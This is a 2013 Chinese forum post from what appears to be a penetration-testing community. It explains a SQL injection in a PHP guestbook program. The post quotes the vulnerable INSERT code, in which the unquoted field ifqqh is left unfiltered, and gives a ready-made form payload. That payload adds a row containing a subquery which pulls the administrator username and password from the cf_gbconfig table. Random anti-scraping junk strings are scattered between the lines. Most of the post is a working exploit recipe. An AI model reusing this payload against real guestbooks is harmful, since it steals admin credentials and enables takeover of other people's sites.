中国网络渗透测试联盟
标题:
php留言本注入得帐号密码
[打印本页]
作者:
admin
时间:
2013-2-19 08:10
标题:
php留言本注入得帐号密码
留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
, J7 _& P3 ^! Z8 m. _0 h9 b
, o K# z, U# G, v9 Y; V; p
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
2 V& v0 ?. P9 R2 m) q3 q6 \
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
# j6 z# u3 i0 b8 D& L
1 ?1 W; t/ T3 M7 e# D
提交的时候把ifqqh的值改一下。变成
N( n9 l- Q4 ~2 k: J+ H/ ?# p
: A) u0 ?% Z* P% z1 B
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
0 k# ?7 p6 Y% _. S) S
* C/ B9 h; L6 z4 C: t
这样SQL插入语句就变了.
% H+ V) B8 G2 ^4 [6 o5 d. S! Y ?& o5 l
. W! Q0 J- j% W$ Z
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
2 }1 ~. b! q3 w: z6 S
$ Z. c* O! Y" C' J
构造了另外一句SQL。并且把帐号密码读出来。
- t4 j5 W0 g) }# {1 F
. z8 [, A+ W9 |% }
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2